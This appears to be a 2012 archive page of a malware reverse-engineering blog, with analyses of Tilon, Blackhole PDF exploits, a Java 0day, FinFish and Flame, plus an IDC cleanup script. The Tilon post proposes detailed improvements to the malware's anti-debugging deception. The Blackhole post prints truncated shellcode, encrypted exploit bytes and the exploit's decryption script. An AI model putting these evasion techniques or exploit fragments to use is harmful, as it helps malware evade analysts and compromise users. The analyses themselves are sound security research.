Scrammed!: 2012

Thursday, October 25, 2012

Tricky Tilon: disappearing instruction, anti-debugging, deceptions and much more!

Introduction

This post is about a sort of anti-debugging trick that I discovered while analyzing a malware named Tilon. Well, to be precise, it's more a deception trick than an anti-debugging one but, as we will see later, it's really easy to tweak it to tamper with debugging.

Tilon is a banker that has been spotted by Trusteer in July 2012 and, aside from some pretty standard stuffs, like a Man In The Browser implementation, it's better known for the peculiarity of making use of several evasion techniques. I found one of them, in the attempt of digging deeper in its various encryption/packer layers, that hasn't been reported yet.

All the layers are very easy to bypass: they roughly consist of basic crypto operations and UPX compression. After solving them you will see the following listing:

...

008D0079 CALL 008D0233
008D007E CALL 008D04DC
008D0083 POPAD
008D0084 ADD ESP,4
008D0087 MOV EAX,DWORD PTR SS:[EBP+4020BF]
008D008D JMP EAX

Tilon's trick(s)

So, we have two CALL and one JMP.

If we step into the first call, we will notice that the malware is going to set an "hook" (it's not properly API hooking as it's only inside the process itself) on the KiUserExceptionDispatcher API (a function of NTDLL.dll that is being called when some types of exception occur) to call (what we will discover to be) a decryption routine.

Pay attention to the code while stepping... As I reminded you before, Tilon is famous for the number of the deception tricks implemented!
For example, the next call makes use of a well known PEB related anti-debugging trick:

008D04DC MOV EAX,DWORD PTR FS:[18]
008D04E2 MOV EAX,DWORD PTR DS:[EAX+30]
008D04E5 MOVZX EAX,BYTE PTR DS:[EAX+2]
008D04E9 TEST EAX,EAX
008D04EB JNZ SHORT 008D04EE
008D04ED RETN
008D04EE INT3
...

Finally, there is a jump that brings us to an encrypted code:

Access violation, indeed!
Since there is no Exception Handler installed, one may think that the code has crashed for some reason that he missed and he will restart the debugger to conduct a more precise analysis. On the other hand, if we use Shift+F8 the malware will decrypt the code because of the previous "hook"! Finally, it will also delete the "hook" from the KiUserExeceptionDispatcher API and jump to the decrypted bytes.

So, this is really not an anti-debugging trick, even if it will work fine in some cases, like against emulators, but, let's stay focused: our goal is to fool the debugger... How can we do it? Well, there are surely several ways to do that, the one I have in mind consists of mixing this trick, the PEB one and... one more finding!

Let me explain it briefly: when Tilon generates the exception, by pressing Shift+F8 the debugger will execute the first instruction of the "hook", but will break only on the second one.
Thus we have:

7C91EAEC 68 FA028D00 PUSH 8D02FA ; the first instruction is executed...
7C91EAF1 C3 RETN ; but the debugger will break only here!

That gives us the possibility of hiding an instruction!

Putting the pieces together:

Tilon: you are doing it wrong...!

Now I will show you one way to improve the trick in the Tilon's code:

STEP 1. We need to change the decryption key with a wrong one and to set a global variable (for instance, 00BD0AB0) containing the address of the decryption routine (in my case 008D02FA).

STEP 2. We modify the hook by writing: JMP [008D0AB0](this instruction will be hidden).

STEP 3. We modify the PEB trick (inside the last call before the jump to the encrypted bytes; see the listing at the beginning of this blog-entry) in the following way:

008D0A00 MOV EAX,DWORD PTR FS:[18]
008D0A06 MOV EAX,DWORD PTR DS:[EAX+30]
008D0A09 MOVZX EAX,BYTE PTR DS:[EAX+2]
008D0A0D JNZ SHORT 008D0A19
008D0A0F MOV DWORD PTR DS:[8D0AB0], 8D0A1A ; no debugger!
008D0A19 RETN
008D0A1A MOV BYTE PTR DS:[8D036D],7A ; small snippet in case of no debugger
008D0A21 JMP 008D02FA
008D0A26 ADD BYTE PTR DS:[EAX],AL

When the code will jump to the encrypted bytes, the exception will call the "hooked" KiUserExceptionDispatcher API, that:

will jump directly to 008D2FA (the decryption routine), using the wrong key, if the debugger is detected;
will jump to the small snippet in the listing above, that will restore the correct decryption key and then jump to 008D2FA, otherwise.

In this way, if an analyst doesn't notice the PEB control (stepping over its call, for instance), the bytes won't be decrypted in the right way and this will cause a crash.

In my opinion, this version of the trick is way better than Tilon's original implementation, but we can improve it much more if we chose not to consider how it was originally structured (that is strongly related to the exception caused by the execution of the encrypted bytes...).

Another way to implement the trick (my fav one ;))

Another variant of Tilon's original implementation of the trick is the following.

We have to set a global variable (let's say 00BD0AB0) that contains an address memory, depending on the result of the PEB anti-debugging trick. Then, we need to generate an appropriate exception (for example, by reaching a null pointer) and to "hook" the KiUserDispatcher API by injecting a JMP 00BD0AB0 (the hidden instruction!).
Thus, we have something like:

...
mov eax, 0
mov [eax], 0
* junk code *
...

The idea is to use the PEB check to set the global variable 00BD0AB0 to the address of * junk code * if the debugger is revealed, and to set it to the right address (where the real code is) otherwise. In this way, the analyst may not notice the "hook" at all, but will use shift+F8 to continue its debugging from the instruction right after the exception.

The following diagram will clarify the procedure:

Of course you can choose a different (more subtle and less visible) way to generate the exception, but the thing is that you can really confuse the analysis using the * junk code * and this can be really time consuming from the analyst perspective. For instance, you can insert some junk code and then terminate the process, or anything else.

Moreover, it's less detectable than setting the jump directly in the PEB check, because of the hidden instruction and the fact that the debugging will continue its execution after the exception itself like you would normally expect.

Note also that the PEB check is only one of the possible tricks to detect the debugger and you can obviously chose a different one!

Conclusion

You can use this technique on its own, or mixing it with other tricks. In case you chose to combine different tricks together, the risk of being detected will increase... but so will the number of possible uses you can make!

Thursday, October 11, 2012

Some notes about the pdf exploits in Blackhole 2.0

Recently we have been hearing a lot about Blackhole 2.0, the last edition of the popular exploit kit, and so I started looking around to gather some more information. In particular, I searched for some websites hosting it and found out a pdf file that caught my attention (you can find it in <blackhole_host>/data/t.pdf).

The curious thing about it is that it doesn't contain any malicious code and if we look closer we understand that it's only a sort of skeleton for the real malicious pdf.

In fact, just analyzing the raw bytes we see the following streams:

3 0 obj<<%data%/CreationDate(%title%)>>

endobj

42 0 obj<</Length 504/Filter[/FlateDecode]/Type/EmbeddedFile>>stream

%config%

endstream

endobj

43 0 obj<</Length 1313/Filter/FlateDecode/Type/EmbeddedFile>>stream

%js%

endstream

endobj

This suggests us that maybe the malicious pdf is built at runtime: it seems that the fields %data%, %title%, %config% and %js% are filled each time with data related to a different exploit, depending on the vulnerability found on the victim's system. Moreover, it is a novelty for the Blackhole exploit kit, as the other versions didn't make use of a similar approach.

So, I conducted further investigations, searched for some live exploit urls to perform a real infection and take a log with WireShark. I then extracted the pdf file from it and started analyzing it.

To do that I used an utility named PDFStreamDumper, that successfully decompresses the streams (note that some other alternatives, such as pdftk, failed in this attempt as maybe the file was intentionally corrupted in order to make the inspection more difficult).

The important streams are the same as the ones listed above, but in this case they are filled with some data (they are reported in a slightly different notation because I had to decompress them). Here they are, together with a brief explanation:

/Keywords(3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d3i3n3g21423a3r133b3b3b1f13… **ENCRYPTED EXPLOIT BYTES** …383j1l1b383l3l1l1c21433i403h1b473k20383l3l1m491c382f1j1b3k1c212f3m3a3g3e2c3i3e3l3d1k1h3r3a432s3a3l413e23383l3l1k49383j1m1b1c21)/CreationDate(6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5… **SHELLCODE BYTES** ...6363636d7477723d3033303333333034333430383335333830393035266c71786d746e66623d30332668657a6e647865663d746c796d6626717666707870656f3d75777462730000)

This stream contains both the encrypted javascript exploit and the shellcode.

<config xmlns="http://www.xfa.org/schema/xci/1.0/" xmlns:xfa="http://www.xfa.org/schema/xci/1.0/"><trace><area level="1" name="font"></area></trace><agent name="designer"><destination>pdf</destination><pdf><fontInfo></fontInfo></pdf></agent><present><pdf><fontInfo><embed>1</embed></fontInfo><version>1.6</version><creator>Adobe Designer 7.0</creator><producer>Adobe Designer 7.0</producer><scriptModel>XFA</scriptModel><interactive>1</interactive><tagged>1</tagged><compression><level>6</level><compressLogicalStructure>1</compressLogicalStructure></compression></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present><acrobat><acrobat7><dynamicRender>forbidden</dynamicRender></acrobat7><common><locale></locale><data><incrementalLoad></incrementalLoad><adjustData></adjustData><xsl><uri></uri></xsl><outputXSL><uri></uri></outputXSL></data><template><base>C:\</base><relevant></relevant><uri></uri></template></common></acrobat></config>

This stream contains some xml data.

<template><subform layout="tb" locale="ru_RU" name="form1"><pageSet><pageArea id="Page1" name="Page1"><contentArea h="10.5in" w="8in" x="0.25in" y="0.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet><subform h="10.5in" w="8in"><field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.05mm"><ui><imageEdit></imageEdit></ui><caption placement="bottom" reserve="5mm"><font typeface="Myriad Pro"></font><para vAlign="middle"></para><value><text>Image Field</text></value></caption><border xmlns="http://www.xfa.org/schema/xfa-template/2.2/"><edge presence="hidden"></edge><edge stroke="dotted"></edge><edge stroke="dotted"></edge><edge stroke="dashed"></edge><corner stroke="dotted"></corner><corner stroke="dotted"></corner><corner stroke="dashed"></corner><fill><pattern type="crossDiagonal"></pattern></fill></border><event xmlns:xfa="http://www.xfa.org/schema/xfa-template/2.2/" activity="initialize">

<xfa:script contentType='application/x-javascript'>

with(event){

k=target[/**/"eval"];

if((app.addMenuItem+/**/"").indexOf(/**/'native')!=-1){a=/**/target.keywords;}

}

s="";

z=a;

/**/ss/**/=/**/String.fromCharCode/**/;

for(i=0;i<a.length;i+=2){

s=s.concat(ss(parseInt(z[i]+z[1+i],0x1d)));

}

k(s);

</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template>

This stream contains the script that decrypts the exploit itself.

To decrypt the exploit, you can use the following html page ("z" contains the encrypted bytes):

<html>

<head>

<title>Decrypted Exploit</title>

</head>

<body>

var z;

var s;

z = "3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d3i3n3g21423a3r133b3b3b1f13… **ENCRYPTED EXPLOIT BYTES** …383j1l1b383l3l1l1c21433i403h1b473k20383l3l1m491c382f1j1b3k1c212f3m3a3g3e2c3i3e3l3d1k1h3r3a432s3a3l413e23383l3l1k49383j1m1b1c21";

s = "";

for(i=0; i < z.length; i+=2)

{

document.write(String.fromCharCode(parseInt(z[i]+z[1+i], 0x1d)));

if(String.fromCharCode(parseInt(z[i]+z[1+i], 0x1d)) == ';' )

document.write("<br/>");

}

</script>

</body>

</html>

Which leads to the following well known vulnerability (CVE-2010-0188):

*REMOVED*

…

_j8='SUkqADggAABB'; // * base64 representation of a TIFF header! *

_j9=_I2('QUFB',10984);

_ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';

_ll1=_j8+_j9+_ll0+_j5;

_ll2=_ji1(_j7,'');

if(_ll2.length%2)_ll2+=unescape('');

_ll3=_j2(_ll2);

with(

{

k:_ll3

}

)_I0(k);

ImageField1.rawValue=_ll1

…

*REMOVED*

I also gathered some other malicious pdf files and found out that they are structured always in the same way: the decryption script may change a little (for example, I found "0x1C" instead of "0x1D", that is the numerical base employed to interpret the bytes), but the method itself will be very similar.

Saturday, September 29, 2012

Cleaning off anti-disassembly code: the IDC way.

Every code that can be executed, can also be reversed. Although, there are some tricks to make this task: more time-consuming; more intricate; more difficult to be turned into an automated analysis.

What's the problem? A sequence of executable code can be disassembled in many different ways, so disassemblers have to use some heuristics that, for their nature, are subject to limitations. Anti-Disassembly techniques take advantage of them!

When an executable code is disassembled, each byte of it occurs in the representation of one, and only one, instruction at the time. So, if the disassembler is forced to make an instruction starting from the wrong offset, the instruction shown by it won't match the one being executed.

In this article I will discuss one of these tricks. The trick itself is not really a big deal as it's a well known one, but I found it to be very annoying as I had to deal with it recently, in the attempt of reversing a malware. For this reason, I decided to automate the task of cleaning off the code and developed a little IDC script, based on some assumptions I'm going to explain.

Let's consider a code in the following form:

call loc_40106A

401050: db 'string01', 0

40106A: * assembly instructions *
......: .....

It will be disassembled as:

call loc_401050+0A

401050: * assembly instructions corresponding to the string interpreted as a code *

40106A: * assembly instructions *
......: .....

(This is an approximate representation: note that the bytes of the string interpreted as opcodes may unalign the instruction at 40106A)

The idea behind the trick is very simple: IDA is unable to distinguish between text and code and makes wrong assumptions while disassembling the executable. In particular, IDA doesn't realize that, following the control-flow, the bytes it interpreted as code (right after the call instruction) are never executed and, thus, they are only text.

Moreover, it is very disturbing from the analyst perspective as it basically hides strings, making it useless to search for them, and also results in some weird disassembled instructions, that complicate the listing.

So, what's the idea to clean off the code?

First, we have to search for a short call, that corresponds to the "E8" opcode and we assume that its operand, that is the following 4 bytes, will have a value between 1 and 100.

Once we find a similar situation, we undefine the bytes of code corresponding to the string with "MakeUnkwown", and then we use "MakeStr" to recompose the original string correctly.

Unfortunatly, even if this procedure will solve most of the cases, it isn't general enough to solve all of them.

Let's consider the following example:

seg000:00403E2A E8 09 00 00 00 call near ptr loc_403E37+1

seg000:00403E2F 69 64 65 6E 74 69 74 79 imul esp, [ebp+6Eh], 79746974h

seg000:00403E37 loc_403E37:

seg000:00403E37 00 57 8D add [edi-73h], dl

seg000:00403E3A 83 8D 28 40 00 FF D0 or dword ptr [ebp-0FFBFD8h], 0FFFFFFD0h

seg000:00403E41 83 C7 08 add edi, 8

seg000:00403E44 2B CF sub ecx, edi

After the procedure described above, it will become:

seg000:00403E2A E8 09 00 00 00 call near ptr unk_403E38

seg000:00403E2F 69 64 65 6E 74 69 74 79+aIdentity db 'identity',0

seg000:00403E38 57 unk_403E38 db 57h

seg000:00403E39 8D db 8Dh

seg000:00403E3A 83 8D 28 40 00 FF D0 or dword ptr [ebp-0FFBFD8h], 0FFFFFFD0h

seg000:00403E41 83 C7 08 add edi, 8

seg000:00403E44 2B CF sub ecx, edi

As you can see, IDA has also undefined some bytes after the string (which should have been legitimate assembly instructions); so, to solve the problem, we may think to go at the end of it and reconvert everything in code, using "MakeCode". But is that enough?

seg000:00403E2A E8 09 00 00 00 call loc_403E38

seg000:00403E2F 69 64 65 6E 74 69 74 79+aIdentity db 'identity',0

seg000:00403E38

seg000:00403E38 loc_403E38:

seg000:00403E38 57 push edi

seg000:00403E39 8D db 8Dh

seg000:00403E3A 83 8D 28 40 00 FF D0 or dword ptr [ebp-0FFBFD8h], 0FFFFFFD0h

seg000:00403E41 83 C7 08 add edi, 8

seg000:00403E44 2B CF sub ecx, edi

No, it isn't! IDA tries to convert the bytes into code, but if they are unaligned it might do that starting from the wrong offset or even fail to complete the task. This happens because IDA originally disassembled the string bytes as code, which led to the disassembly of the following bytes in incorrect instructions like the above "or dword ptr [ebp-0FFBFD8h]". Because of this, when you try to realign the code, and assemble the correct instruction starting from the byte "8D", IDA fails because the opcode "8D" needs to take the bytes from the "or" instruction, and IDA won't break an instruction that already exists.

Even undefining some of the bytes after the string and then trying to translate them back into code doesn't work because, for the nature of the problem, you don't know exacly how many bytes is better to consider to do this task. You can make some heuristic and try with about ten bytes, but this solution doesn't always give accurate results. Moreover, if there's another call in those ten bytes the things go even worse!

The basic idea to try to solve the problem is to manually parse the raw bytes. I wrote a little IDC script to do that; here is a brief explanation of how it works:

It searches for the "0xE8" byte and takes its operand, that is the size of the string.

It undefines the subsequent "size" bytes and recomposes them as a string.

Then, it iterates the following procedure:

It tries to undefine a byte and to make an instruction from it (after the first execution of this step, the undefining operation won't have any effect in case of step 3.).

If the instruction is made, go back to 1. and continue with the bytes after the instruction.

If the instruction wasn't made, undefine one more byte (to a maximum of 16), in the attempt at making it, and repeat from step 1.

In this way, only one byte at a time is undefined and so is the building of the corresponding instruction, whenever possible.

I also assumed that if there are four subsequent instructions that are already interpreted as code, then the bytes are aligned and the work is done. Finally, if any of the recomposed instructions is a call, the algorithm will start over again.

Here is the final script (change "MIN" and "MAX" with the addresses that define the range of the code in which you want to run the script - e.g. MIN = 0x00401000, MAX = 0x00404FFF):

auto i, j;

auto Size;

auto Delta, DeltaTemp, DeltaUndef;

for(i = MIN; i < MAX; i++)

{

if(Byte(i) == 0xE8)

{

Size = Dword(i + 1);

if(Size > 1 && Size < 100)

{

Message(" %08x \n ", i);

MakeUnknown(i+5, Size, DOUNK_DELNAMES);

MakeStr(i+5, i+5+Size);

Delta = 0;

DeltaUndef = 0;

for(j = 0; j < 4; j++)

{

if(Byte(i+5+Size + Delta) == 0xE8)

{

break;

}

MakeUnknown(i+5+Size + Delta, 1, DOUNK_DELNAMES);

DeltaTemp = MakeCode(i+5+Size + Delta);

if(DeltaTemp != 0)

{

Delta = Delta + DeltaTemp;

DeltaUndef = 0;

}

else

{

j = 0;

DeltaUndef++;

if(DeltaUndef > 16)

{

break;

}

if(Byte(i+5+Size + Delta + DeltaUndef) == 0xE8)

{

break;

}

MakeUnknown(i+5+Size + Delta + DeltaUndef, 1, DOUNK_DELNAMES);

Message("-- Undef %08x \n", i+5+Size + Delta + DeltaUndef);

}

}

P.S. I know the code looks twisty and more complicated than it needs to be, but I had to write it this way to bypass some glitches I was having with a couple of IDC APIs.

Monday, August 27, 2012

Analysing CVE-2012-4681 (latest Java 0day)

Yesterday I spotted the news about a new Java 0day being exploited in the wild and soon after a POC was released: http://pastie.org/4594319.
I decided to analyse this code to understand what is the vulnerability that triggers the exploit. Here is a brief description of my findings.

The code instantiates a Statement object that will be used to run the setSecurityManager() method of the System class. The purpose is to set the Security Manager to null, which means escaping the Java sandbox. Of course, you can't do this directly and here comes the exploit!

The Statement object contains a field named "acc", which is a AccessControlContext (a sort of security descriptor) that specifies the permissions allowed for the Statement object itself. This field is normally not accessible from the code outside the Statement class, so the exploit needs to find a way to modify it.

It does so by using the getField() method of the sun.awt.SunToolkit object: this function returns a given field from a given object; in this case it returns Statement.acc. At this point the game is over because the malicious code can just create a new AccessControlContext object, assign to it full permissions and then replace the old restricted Statement.acc with the new unrestricted one.

Mistery solved? Not yet: the tricky part is in obtaining an instance of the object sun.awt.SunToolkit, that is supposed to be a restricted package. The exploit does this by calling Class.forName(); this method simply returns an object from its name.

This is how I understand the code (and I'm no Java expert), but I read this blog entry that has a slightly different explanation. In their analysis, the authors see another method that accomplishes the task: com.sun.beans.finder.ClassFinder.
I don't know what this is about: do they have a different POC or sample? It does seem so!

Also they say that the exploit itself relies on the possibility of instantiating the sun.awt.SunToolkit object through the com.sun.beans.finder.ClassFinder object. This would mean that in the POC I have analysed the vulnerability is in the Class.forName() method, that is, there are TWO different vulnerabilities (one in ClassFinder and one in Class.forName()).

However, debugging the exploit in Java version 1.6 (jre6) it did not work: the Class.forName() object successfully instantiated the sun.awt.SunToolkit object, but then the use of its getField() method threw an exception. Instead, the method works fine in version 1.7 (jre7). To make it short:

So, even if version 1.6 allows the instantiation of the sun.awt.SunToolkit object, it prevents it from accessing the private Statement.acc field, which seems correct. It seems that the bug is really in version 1.7, in the access to the Statement.acc. Or maybe none of the two is supposed to happen: sun.awt.SunToolkit must not be instantiated to restricted code, and the Statement.acc field must not be accessed by anyone.

I will look forward to new results.

*UPDATE* [28 August 2012]
1) Now we can refer to the above vulnerability as "CVE-2012-4681".
2) A new analysis, based on the same POC I documented, has been published today: http://thexploit.com/sec/java-facepalm-suntoolkit-getfield-vulnerability/ . So, yes, it seems that getField() is the culprit, or at least it's one of them...

*UPDATE 2* [28 August 2012]
A more in-depth analysis is finally out: http://immunityproducts.blogspot.com.ar/2012/08/java-0day-analysis-cve-2012-4681.html
As I though there are two different 0days: one that allows you to get a reference to the restricted class sun.awt.SunToolkit, and the other one (getField()) that lets you access a private field of a class. The missing detail (classFinder()) is also solved: it is used in the internal implementation of the execute() method of the Expression object.

Friday, August 17, 2012

FinFish's trick... not so legendary!

This post is about a trick that Finfish uses to appear (well, at least, "to try to appear"!) as a normal, non malicious program.
First of all you can immediately notice that this sample is a simple loader: you can have a look at the IDA navigation bar to spot a tiny code section in contrast to a huge resource section.

This tells us that something is hidden somewhere in the resources. The payloads, in fact, are encrypted and stored in the dialog type resources. Here's a quick verification test, that shows that something is wrong in the dialog data:

But let's go back to the curious trick we mentioned, and let's begin by analyzing the code. If we start looking from the entry point we notice... absolutely nothing!
At a first glance nothing suggests that we are analyzing a malware, as we only go through some common APIs.

Of course, a deeper reading reveals the trick: in the middle of some legitimate calls we find a suspicious function. The thing that more captured my attention is that it makes use of the VirtualProtect API different times, apparently without any good reason, as we will see later.

For now let's start from the beginning:

.text:004011F5 push 0 ; lpModuleName
.text:004011F7 call ds:GetModuleHandleW
.text:004011FD mov ebp, eax ; MZ header
.text:004011FF mov eax, [ebp+3Ch] ; MZ.elfanew = PE offset
.text:00401202 mov esi, [eax+ebp+80h] ; import table RVA
.text:00401209 mov eax, [esi+ebp+0Ch] ; import name RVA

This code gets the handle of the application itself and then it reads: the MZ header; the PE offset; the import table RVA; the first import name RVA.

.text:0040120D add esi, ebp ; virtual address of the image import descriptor
...
.text:00401223 add eax, ebp
.text:00401225 push offset aUser32_dll_0 ; "user32.dll"
.text:0040122A push eax ; char *
.text:0040122B call __stricmp
.text:00401230 add esp, 8
...
.text:00401237 add esi, 14h
.text:0040123A mov [esp+18h+var_4], esi
.text:0040123E jmp loc_4012E6
...
.text:004012E6 mov eax, [esi+0Ch]
.text:004012E9 test eax, eax
.text:004012EB jnz loc_401223

Then the malware calculates the virtual addresses of the first image import descriptor, its import name address, and begins a loop over the import names looking for "user32.dll".

.text:00401243 mov edi, [esi]
.text:00401245 mov esi, [esi+10h]
.text:00401248 mov eax, [edi+ebp]
.text:0040124B add edi, ebp
.text:0040124D add esi, ebp
...
.text:00401257 jmp short loc_401260
...
.text:00401260 lea ecx, [eax+ebp+2] ; Name
.text:00401264 push offset aRegisterclasse ; "RegisterClassExW"
.text:00401269 push ecx ; char *
.text:0040126A call __stricmp
.text:0040126F add esp, 8
.text:00401272 test eax, eax
.text:00401274 jnz short loc_401297
...
.text:00401297 mov edx, [edi]
.text:00401299 lea eax, [edx+ebp+2]
.text:0040129D push offset aCreatewindowex ; "CreateWindowExW"
.text:004012A2 push eax ; char *
.text:004012A3 call __stricmp
.text:004012A8 add esp, 8
.text:004012AB test eax, eax
.text:004012AD jnz short loc_4012D0
...
.text:004012D0 mov eax, [edi+4]
.text:004012D3 add edi, 4
.text:004012D6 add esi, 4
.text:004012D9 test eax, eax
.text:004012DB jnz short loc_401260

Here the code saves the content of the OriginalFirstThunk and the FirstThunk fields of the IMAGE_IMPORT_DESCRIPTOR. Then, it loops over every IMAGE_IMPORT_BY_NAME.Name looking for the RegisterClassExW and the CreateWindowExW APIs.

Once they are found it does the following:

[RegisterClassExW]

.text:00401276 lea edx, [esp+18h+flOldProtect]
.text:0040127A push edx ; lpflOldProtect
.text:0040127B push 40h ; flNewProtect
.text:0040127D push 4 ; dwSize
.text:0040127F push esi ; lpAddress
.text:00401280 call ebx ; VirtualProtect
.text:00401282 lea eax, [esp+18h+flOldProtect]
.text:00401286 push eax ; lpflOldProtect
.text:00401287 mov dword ptr [esi], offset BadFunc1 ; FirstThunk overwrite
.text:0040128D mov ecx, [esp+1Ch+flOldProtect]
.text:00401291 push ecx ; flNewProtect
.text:00401292 push 4 ; dwSize
.text:00401294 push esi ; lpAddress
.text:00401295 call ebx ; VirtualProtect

[CreateWindowExW]

.text:004012AF lea ecx, [esp+18h+flOldProtect]
.text:004012B3 push ecx ; lpflOldProtect
.text:004012B4 push 40h ; flNewProtect
.text:004012B6 push 4 ; dwSize
.text:004012B8 push esi ; lpAddress
.text:004012B9 call ebx ; VirtualProtect
.text:004012BB lea edx, [esp+18h+flOldProtect]
.text:004012BF push edx ; lpflOldProtect
.text:004012C0 mov dword ptr [esi], offset BadFunc2 ; FirstThunk overwrite
.text:004012C6 mov eax, [esp+1Ch+flOldProtect]
.text:004012CA push eax ; flNewProtect
.text:004012CB push 4 ; dwSize
.text:004012CD push esi ; lpAddress
.text:004012CE call ebx ; VirtualProtect

Basically, it changes the protection of the memory containing the import addresses, using the VirtualProtect API; then it overwrites the FirstThunk entry, related to the RegisterClassExW and CreateWindowExW APIs, with a malicious offset.
In this way, every time one of these APIs is called it won't be executed and, instead, the code located at the malicious offset will be run. Even debugging the code, if we don't step into the calls, nothing will suggest that the code is being hijacked.

As we can see the ones above seem to be normal, legitimate, calls, but they are really hijacked to the malicious routines. And here is the trick in action in the debugger:

Note that this is not API hooking, but only a simple trick that works in the executable itself: it's not the API code being overwritten, it is the FirstThunk of the malicious executable.

What can I say... It's not a very advanced deception trick, but a curious one at least: come on guys, you can do better!

Monday, June 11, 2012

Why Flame is a pain to analyze - a look at its intricate compilation style.

Introduction

This post is about some peculiarities of the assembly code of Flame, the malware infiltrating Iranian computers. Note that I'm not going to give you any additional detail, or new issues about its analysis; if you are interested in this kind of stuff I suggest you to read the report written by CrySyS, that is by far the most comprehensive available description of its different components.

Aside from that, it should be noted that although the main functionalities of Flame have been identified, there's still a lot of undocumented code. So I hope that, for those of you who want to perform their own analysis, it will be helpful to understand more about its compilation style, and that's why I'm writing these little notes.

In order to do that I decided to discuss a specific routine in the "advnetcfg.ocx" file: the RC4 encryption routine. In particular, I focused on the attempt to retrieve the key.
Although I'm not the first one to find it, as it appears also in the CrySyS report cited above (without describing the procedure), the scope of this post is to show you how a standard task like that is made intricate and time-consuming by the compilation style.

This is only an example to highlight such a kind of structured code, as you will find it all over the malware. Of course, this isn't the only peculiarity that makes its code more difficult to understand: maybe there will be a sequel to continue this discussion.

First, we will describe how to deal with the RC4 algorithm in order to identify which parameter is used for the key but, even knowing that, it won't be enough for finding its content directly and we will be going through some intricate code to finally reveal its value.

Let's get it started.


Analyzing RC4

Giving a look at the code, we notice the following loop:

.text:1002598F mov [eax+ecx], al

.text:10025992 inc eax

.text:10025993 cmp eax, 100h

.text:10025998 jl short loc_1002598F

It is a typical hint to recognize the RC4 algorithm, as it composes a 0x100 (= 256 dec) bytes array, that is the initial permutation box. Just compare it to one of the RC4 source codes available online (this, for instance), and look for the Assembly-C correspondence:

for (i = 0; i < 256; i++)
state->perm[i] = (u_char)i;


Then we can see another clear sign of RC4:

.text:1002599C   mov [ecx+100h], dl
.text:100259A2   mov [ecx+101h], dl


It obviously refers to:

state->index1 = 0;
state->index2 = 0;


Putting these lines together we get the RC4 "state" structure, which belongs to the "rc4_init" function. You can also notice that the "rc4_crypt" function is reported in the following lines, as probably the code was just copied from a source similar to the one we are referring to.

We also know that the prototype of the "rc4_init" function is:

void rc4_init(struct rc4_state *const state, const u_char *key, int keylen);

But in the assembly code we see only two parameters:

.text:10025986 arg_0 = dword ptr 8

.text:10025986 arg_4 = dword ptr 0Ch

This is weird! It means that one of them is missing: why? For the moment let's just say that the answer is related to the intricate nature of the code that I will clarify later.

First let's look for the code that uses the key. In the C code we have:

j += state->perm[i] + key[i % keylen];


We are interested in finding an Assembly correspondence for the last addendum:

.text:100259DA   idiv [ebp+arg_4]


This tells us that arg_4 is the key length. Moreover:

.text:100259DD   inc [ebp+var_8]
.text:100259E0 cmp [ebp+var_8], 100h
.text:100259E7 jl short loc_100259AF


So, var_8 in the Assembly code is the counter i in the C code, and to find the key we have to look for an Assembly instruction reading one byte from the memory. This consideration leads us to:

mov bl, [esi+edi]


We are indeed interested in edi that comes from arg_0:

.text:100259B2   mov edi, [ebp+arg_0]


that is... the key!
Well, here we are... we found the key... but are we done? Usually the answer would be "yes", but in this case there's more work to do and this is where the code becomes intricate.


Tracking the key

Now we know that the key is passed to the "rc4_init" function as the first argument and we want to track it back to see its content. So, we follow the code using the Cross References and notice that eax corresponds to arg_0, as it is pushed right before the call to "rc4_init":

.text:1000E69F call get_key_object

.text:1000E6A4 push eax

.text:1000E6A5 lea ecx, [esi+4]

.text:1000E6A8 call rc4_init

What about eax?

It comes from the "get_key_object" call, from which we get:

.text:1000C537   mov eax, [ecx+4]
.text:1000C53A   mov eax, [eax+0Ch]
.text:1000C53D   add eax, [ecx+8]
.text:1000C540   retn

A little remark: as a convention, the C++ "this" pointer is stored in the ecx registry. If you are interested in reversing C++ applications you should read this paper as a starting point. More info about the "this" pointer can be found here.

Basically, the code above reads a pointer and then adds something to it, leading to the final pointer to the key. In particular, you can picture the whole code as "memory buffer" object, that contains a pointer to the data and an index to access it.
Something like this:


   this
   +---------------+
00 | ... | Obj_data
   +---------------+ +---------------+
04 | ptr Obj_data | ---> | ... | 00
   +---------------+ +---------------+
08 | Index | | ... | 04
   +---------------+ +---------------+
   | ... | | ... | 08 Key
   +---------------+ +--+
   | ptr byte Key | 0C ---> | | 0
   +---------------+ +--+
   | ... | | | 1
   +--+
   |..| 2

Now we have to follow ecx before "get_key_object" is called, and we see:

.text:1000E69C   lea ecx, [ebp+var_20]


So, we want to investigate when "var_20" is filled with a value.

.text:1000E67F mov esi, ecx

.text:1000E681 push [ebp+arg0]

.text:1000E684 lea eax, [ebp+var_20]

.text:1000E687 lea ebx, [esi+108h]

.text:1000E68D push eax

.text:1000E68E   call key_from_arg0?


From the code above we may think that the key is passed through arg0, but if we try to follow arg0 via Cross Reference we don't go very far:

.text:1000E5CE   push   0

.text:1000E5D0 lea eax, [ebp+var_20]

.text:1000E5D3 push eax

.text:1000E5D4 xor ebx, ebx

.text:1000E5D6 call instantiate_object

.text:1000E5DB mov byte ptr [ebp+var_4], 2

.text:1000E5DF push eax

.text:1000E5E0 mov ecx, esi

.text:1000E5E2   call   do_rc4


arg0 is the first parameter of the function we were in, before the Cross Reference, let's call it "do_rc4"; so we have to follow eax, that is the return value of the "instantiate_object" function. This call takes 0 and var_20 as its parameters and returns an empty object.

